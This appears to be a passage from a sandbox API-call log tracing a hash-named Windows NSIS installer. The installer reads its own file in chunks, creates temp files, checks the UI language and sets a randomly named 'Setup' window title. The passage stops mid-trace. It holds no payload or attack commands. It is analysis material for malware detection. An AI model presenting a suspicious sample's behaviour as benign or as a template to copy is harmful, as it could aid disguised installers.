(lpLibFileName="C:\\Windows\\system32\\VERSION.dll", hFile=0x0, dwFlags=0x8) returned 0x6e830000 [0118.589] GetProcAddress (hModule=0x6e830000, lpProcName="GetFileVersionInfoW") returned 0x6e831570 [0118.589] GetModuleHandleA (lpModuleName="SHFOLDER") returned 0x0 [0118.589] GetSystemDirectoryW (in: lpBuffer=0x19f928, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0118.589] wsprintfW (in: param_1=0x19f94e, param_2="%s%S.dll" | out: param_1="\\SHFOLDER.dll") returned 13 [0118.589] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\SHFOLDER.dll", hFile=0x0, dwFlags=0x8) returned 0x6e510000 [0118.603] GetProcAddress (hModule=0x6e510000, lpProcName="SHGetFolderPathW") returned 0x6e511d30 [0118.603] GetModuleHandleA (lpModuleName="SHLWAPI") returned 0x77680000 [0118.603] GetProcAddress (hModule=0x77680000, lpProcName=0x1b5) returned 0x77698dd0 [0118.603] IsOS (dwOS=0x1e) returned 1 [0118.604] InitCommonControls () [0118.604] OleInitialize (pvReserved=0x0) returned 0x0 [0118.627] SHGetFileInfoW (in: pszPath="", dwFileAttributes=0x0, psfi=0x19fb8c, cbFileInfo=0x2b4, uFlags=0x0 | out: psfi=0x19fb8c) returned 0x1 [0118.759] lstrcpynW (in: lpString1=0x429220, lpString2="NSIS Error", iMaxLength=1024 | out: lpString1="NSIS Error") returned="NSIS Error" [0118.760] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\bb36f0ab95d6422a20e81221adeb4033ebdbd7b20337a2557f3f5c3de0a77596.exe\" " [0118.760] lstrcpynW (in: lpString1=0x435000, lpString2="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\bb36f0ab95d6422a20e81221adeb4033ebdbd7b20337a2557f3f5c3de0a77596.exe\" ", iMaxLength=1024 | out: lpString1="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\bb36f0ab95d6422a20e81221adeb4033ebdbd7b20337a2557f3f5c3de0a77596.exe\" ") returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\bb36f0ab95d6422a20e81221adeb4033ebdbd7b20337a2557f3f5c3de0a77596.exe\" " [0118.763] GetTempPathW (in: nBufferLength=0x400, lpBuffer=0x437800 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0118.769] lstrlenW (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0118.769] lstrcatW (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0118.769] CreateDirectoryW (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0118.774] GetLastError () returned 0xb7 [0118.774] GetTickCount () returned 0xac0a0d [0118.774] GetTempFileNameW (in: lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpPrefixString="nsv", uUnique=0x0, lpTempFileName=0x437000 | out: lpTempFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsvA0D.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsva0d.tmp")) returned 0xa0d [0118.778] DeleteFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsvA0D.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsva0d.tmp")) returned 1 [0118.780] GetTickCount () returned 0xac0a0d [0118.780] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x438800, nSize=0x400 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\bb36f0ab95d6422a20e81221adeb4033ebdbd7b20337a2557f3f5c3de0a77596.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bb36f0ab95d6422a20e81221adeb4033ebdbd7b20337a2557f3f5c3de0a77596.exe")) returned 0x62 [0118.780] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\bb36f0ab95d6422a20e81221adeb4033ebdbd7b20337a2557f3f5c3de0a77596.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bb36f0ab95d6422a20e81221adeb4033ebdbd7b20337a2557f3f5c3de0a77596.exe")) returned 0x20 [0118.781] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\bb36f0ab95d6422a20e81221adeb4033ebdbd7b20337a2557f3f5c3de0a77596.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\bb36f0ab95d6422a20e81221adeb4033ebdbd7b20337a2557f3f5c3de0a77596.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0x210 [0118.781] lstrcpynW (in: lpString1=0x436800, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\bb36f0ab95d6422a20e81221adeb4033ebdbd7b20337a2557f3f5c3de0a77596.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\bb36f0ab95d6422a20e81221adeb4033ebdbd7b20337a2557f3f5c3de0a77596.exe") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\bb36f0ab95d6422a20e81221adeb4033ebdbd7b20337a2557f3f5c3de0a77596.exe" [0118.781] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\bb36f0ab95d6422a20e81221adeb4033ebdbd7b20337a2557f3f5c3de0a77596.exe") returned 98 [0118.785] lstrcpynW (in: lpString1=0x439000, lpString2="bb36f0ab95d6422a20e81221adeb4033ebdbd7b20337a2557f3f5c3de0a77596.exe", iMaxLength=1024 | out: lpString1="bb36f0ab95d6422a20e81221adeb4033ebdbd7b20337a2557f3f5c3de0a77596.exe") returned="bb36f0ab95d6422a20e81221adeb4033ebdbd7b20337a2557f3f5c3de0a77596.exe" [0118.785] GetFileSize (in: hFile=0x210, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1eb8f [0118.792] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.702] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.704] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.704] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.704] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.704] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.704] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.704] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.704] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.704] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.704] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.704] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.704] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.704] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.704] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.704] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.704] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.704] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.704] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.705] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.705] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.705] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.705] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.705] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.705] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.705] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.705] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.705] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.705] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.705] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.705] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.705] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.705] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.705] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.705] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.705] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.705] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.705] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.705] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.705] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.705] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.705] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.705] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.705] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.705] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.706] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.706] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.706] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.706] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.706] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.706] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.706] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.706] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.706] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.706] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.706] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.706] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.706] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.706] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.706] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.706] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.706] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.706] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.706] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.706] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.706] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.706] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.706] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.706] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.706] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.706] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.707] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.707] ReadFile (in: hFile=0x210, lpBuffer=0x40ceb8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fb30, lpOverlapped=0x0 | out: lpBuffer=0x40ceb8*, lpNumberOfBytesRead=0x19fb30*=0x200, lpOverlapped=0x0) returned 1 [0300.707] SetFilePointer (in: hFile=0x210, lDistanceToMove=36892, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x901c [0300.708] ReadFile (in: hFile=0x210, lpBuffer=0x19fb3c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19fa7c, lpOverlapped=0x0 | out: lpBuffer=0x19fb3c*, lpNumberOfBytesRead=0x19fa7c*=0x4, lpOverlapped=0x0) returned 1 [0300.708] GetTickCount () returned 0xaed0af [0300.708] ReadFile (in: hFile=0x210, lpBuffer=0x414ec0, nNumberOfBytesToRead=0x5a2, lpNumberOfBytesRead=0x19fa7c, lpOverlapped=0x0 | out: lpBuffer=0x414ec0*, lpNumberOfBytesRead=0x19fa7c*=0x5a2, lpOverlapped=0x0) returned 1 [0300.731] GetTickCount () returned 0xaed0ce [0300.731] GetTickCount () returned 0xaed0ce [0300.731] SetFilePointer (in: hFile=0x210, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95c2 [0300.732] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x74580000 [0300.733] GetProcAddress (hModule=0x74580000, lpProcName="GetUserDefaultUILanguage") returned 0x7459b0a0 [0300.733] GetUserDefaultUILanguage () returned 0x409 [0300.738] wsprintfW (in: param_1=0x437000, param_2="%d" | out: param_1="1033") returned 4 [0300.739] wsprintfW (in: param_1=0x437000, param_2="%d" | out: param_1="1033") returned 4 [0300.739] lstrlenW (lpString="eyeglaemqezgqnwtoqba") returned 20 [0300.739] lstrcpynW (in: lpString1=0x429220, lpString2="eyeglaemqezgqnwtoqba Setup", iMaxLength=1024 | out: lpString1="eyeglaemqezgqnwtoqba Setup") returned="eyeglaemqezgqnwtoqba Setup" [0300.739] SetWindowTextW (hWnd=0x0, lpString="eyeglaemqezgqnwtoqba Setup") returned 0 [0300.739] lstrcpynW (in: lpString1=0x4a330c, lpString2="yabotflkelw", iMaxLength=1024 | out: lpString1="yabotflkelw") 